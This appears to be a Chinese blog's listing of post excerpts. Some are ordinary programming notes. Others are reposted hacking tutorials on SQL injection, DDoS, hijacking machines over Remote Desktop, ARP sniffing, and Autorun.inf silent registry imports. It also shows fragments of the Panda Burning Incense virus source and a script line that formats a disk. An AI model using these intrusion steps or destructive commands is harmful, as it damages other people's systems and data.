- 博客(20)
- 收藏
- 关注
原创 EL表达式取servlet中的对象
EL的语法:<br /><br />比如: request.setAttibute("person",Person);<br /><br />在JSP页面中如何访问person呢?<br /><br /><html><br /><br /><body><br /><br />the person is: ${person}<br /><br /></body><br /><br /></html><br /><br />如何访问一个对象的属性呢?比方说一个对象 Person 的 name属性<br /><b
2010-08-13 15:51:00
1040
原创 SQL触发器
一个简单的小实例就明白~! user表在这张表中建立触发器 Create trigger tiggername on user for delete as begin delete from user2 end; 当删除表user中的某一记录时,user2表里的数据全部删除~! 如果要
2010-03-11 23:06:00
477
原创 DataGridView控件与SQL多表连接~!
一个最简单的代码段:string sql = string.Format("select Consult_Info.CName,Consult_Record.RTime,Consult_Record.RContent,Emp_Info.EName,CMode.Mode from Consult_Info inner join Consult_Record on(Consult_Info.CID
2010-03-06 22:49:00
1102
转载 SQL注入入侵动网SQL
编辑前言:这个文章我没有测试,但前提条件还是很多,比如一定要有别的程序存在,而且也要用同一个SQLSERVER库,还得假设有注入漏洞。说到底和动网没有什么关系,但因为动网论坛的开放性,让人熟悉了其数据库结构,和程序运作方法。在一步步的攻击中取得管理权限,再一步步的提升权限,如果正好数据库用的是SA帐号,就更是麻烦了。 正是由于这些条件的假设,所以大家也不用太紧张,这里提供的是很多理想状态下的入侵行
2010-02-24 19:24:00
552
转载 DDoS攻击原理及防范(一)
分布式拒绝服务攻击(DDoS)是目前黑客经常采用而难以防范的攻击手段。本文从概念开始详细介绍了这种攻击方式,着重描述了黑客是如何组织并发起的DDoS攻击,结合其中的Syn Flood实例,您可以对DDoS攻击有一个更形象的了解。最后作者结合自己的经验与国内网络安全的现况探讨了一些防御DDoS的实际手段。 DDoS攻击概念 DoS的攻击方式有很多种,最基本的DoS攻击就是利用合理的服
2010-02-24 19:23:00
631
转载 用自解压包入侵
用自解压包删光别人的硬盘,相信大家都会。我给大家介绍个用自解压包入侵的方法。 如果捆绑一个木马给别人,只要稍有常识的人有杀毒软件就可以识破。如果不用木马, 用些批处理炸弹、碎片对象文件、或自导入注册表文件,就可以实现各种攻击。 把以下两行保存为Autorun.inf [Autorun] open=regedit /s Autorun.reg 把以下一段保存为Autorun.reg REGEDIT4
2010-02-24 19:22:00
523
转载 简单突破QQ好友拒加
我们有遇到这样的情况。就是有MM号Q号。但她好友上设置为拒加。加不了就不能聊天。为此而苦恼。现在教大家一种简单的方法。轻易绕过骗验和MM聊天 以QQ:10000来试范 下面看****作。 先加一下10000。状态是拒加的。 在生成在线状态的网页上,填上你需要和她的聊的QQ号码~ 然后复制代码。 在桌面新建一个空文档,把代码复制进去。 保存后,把后缀名改为htm 这样就可以了。 打开试试 这样就开了
2010-02-24 19:21:00
2279
2
转载 熊猫烧香--核心代码1
program japussy; uses windows, sysutils, classes, graphics, shellapi{, registry}; const headersize = 82432; //病毒体的大小 iconoffset = $12eb8; //pe文件主图标的偏移量 //在我的delphi5 sp1上面编译得到的大小,
2010-02-24 19:20:00
565
转载 常用的DoS命令:IPC$口令
DOS 常用命令: dir 列文件名 deltree 删除目录树 cls 清屏 cd 改变当前目录 copy 拷贝文件 diskcopy 复制磁盘 del 删除文件 format 格式化磁盘 edit 文本编辑 mem 查看内存状况 md 建立子目录 move 移动文件、改目录
2010-02-24 19:20:00
841
转载 建立你的3389肉鸡
在当今世界上,电脑信息网络使人们得以在国内各地乃至全球范围内交换各种各样的信息,正所谓“足不出户能知天下事”。在目前全球性电脑信息网络中,最为成功和覆盖面最大、信息资源最丰富的当属 现在有输入法漏洞的机器已不多了,除非你遇见的是一个极不负责任的网管,呵呵!~这篇教程就是教你不用输入法漏洞就能用终端服务连接上开3389的机器,使它成为你的肉鸡。(下面的人要注意啊,不要搞国内的机器,我用来做示范的是台
2010-02-24 19:18:00
571
转载 黑客入侵的基础:口令入侵法
要入侵系统首先阻碍我们的将是网络管理员的第一道安全防线——合法的用户名与口令,它决定于你在该网站的权限,所以口令入侵法可以说是黑客的基础,对于一个刚开始学习HACK的网友这篇文章可能会让你大有所进。 当我们要试着解密之前我们得先来了解一下加密的过程,兼于加密方法的种类之多,我们就讲一下标准的UNIX加密技术,但关于DES加密技术的材料很少这主要是IBM应美国国家安全局的要求把某些文档定为了国家
2010-02-24 19:17:00
929
转载 不是所有的黑客都是罪犯!
黑客有自己的道德准则:所有的信息都应当是免费的;打破电脑集权;计算机使生活更美好等 普通的电脑程序员要成为黑客也不难,但要成为一名黑客高手,除了智慧,还要有足够的耐心和毅力 网络安全最薄弱的环节并不是系统漏洞,而是人的漏洞 电脑黑客是一群处于地下状态的电脑狂人,尽管技术高超,但他们却不能抛头露面,他们的网站一律以黑色为背景,平添几分神秘色彩。想到黑客,人们脑中就闪现出两个字:罪犯。 不过最近,这些
2010-02-24 19:16:00
617
转载 头号电脑黑客凯文·米特尼克
在全球的黑客名单中,凯文·米特尼克是最具传奇色彩的人物。好莱 坞甚至把他搬上了银幕。在他15岁的时候,仅凭一台电脑和一部调制解 调器就闯入了北美空中防务指挥部的计算机系统主机。美国联邦调查局 将他列为头号通缉犯,并为他伤透了脑筋。可以说,米特尼克是真正的 少年黑客第一户。 凯文·米特尼克于1964年出生在美国西海岸的洛杉矶。只有3岁的时候 ,他的父母就离异了。他跟着母亲生活,很快就学会了自立,但父
2010-02-24 19:15:00
2676
转载 早期的黑客
hacker时代的滥觞始於1961 年mit出现第一台电脑dec pdp-1。mit的tech model railroad club(简称tmrc)的power and signals group买了这台机器後,把它当成最时髦的科技玩具,各种程式工具与电脑术语开始出现,整个环境与文化一直发展下去至今日。 这在steven levy的书`hackers 前段有详细的记载(anchor/doubl
2010-02-24 19:15:00
614
转载 ARP监听渗透内网的方法
假设想攻击的主机IP是:61.139.1.79 ,同一子网下我们已有权限的主机IP是:61.139.1.88并可以3389登陆 第一步: tracert 61.139.1.1 C:/WIN2000/system32>tracert 61.139.1.1 Tracing route to HACK-4FJ7EARC [61.139.1.1] over a maximum of 30 hop
2010-02-24 19:09:00
454
转载 恶意代码(黑客)` 仅供学习
1、格式化硬盘[Copy to clipboard]CODE: scr.Reset(); scr.Path="C:/windows/Men?inicio/Programas/Inicio/automat.hta"; scr.Doc="wsh.Run(start /m format a
2010-02-24 19:06:00
652
转载 浅析七种DDoS攻击技术
DDOS攻击是现在最常见的一种黑客攻击方式,下面就给大家简单介绍一下DDOS的七种攻击方式。 1.Synflood: 该攻击以多个随机的源主机地址向目的主机发送SYN包,而在收到目的主机的SYN ACK后并不回应,这样,目的主机就为这些源主机建立了大量的连接队列,而且由于没有收到ACK一直维护着这些队列,造成了资源的大量消耗而不能向正常请求提供服务。 2.Smurf:该攻击向一个子网的广播地
2010-02-24 19:04:00
570
转载 黑客常用九种攻击方法
许多上网的用户对网络安全可能抱着无所谓的态度,认为最多不过是被“黑客”盗用账号,他们往往会认为“安全”只是针对那些大中型企事业单位的,而且黑客与自己无怨无仇, 干嘛要攻击自己呢?其实,在一无法纪二无制度的虚拟网络世界中,现实生活中所有的阴险和卑鄙都表现得一览无余,在这样的信息时代里,几乎每个人都面临着安全威胁,都有必要对网络安全有所了解,并能够处理一些安全方面的问题,那些平时不注意安全的人,往往在
2010-02-24 19:00:00
1738
转载 c#如何计算两个日期相差几年几个月?C#日期间隔 c#时间间隔
/// /// 计算日期的间隔(静态类)/// public static class dateTimeDiff{ /// /// 计算日期间隔 /// /// 要参与计算的其中一个日期字符串 /// 要参与计算的另一个日期字符串 /// 一个表示日期间隔的TimeSpan类型 public static TimeSpan toResult(strin
2010-02-22 22:25:00
6629
转载 程序员需要具备的基本技能
程序员需要具备的基本技能 软件开发是一个跨度很大的技术工作,在语言方面,有C,C++,Java,Ruby等等等等,在环境方面,又分嵌入式,桌面系统,企业级,WEB,基础系统,或是科学研究。但是,不管是什么的情况,总是有一些通用的基本职业技能。这些最基本的职业技能通常决定了一个程序员的级别,能否用
2010-02-18 21:36:00
449
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人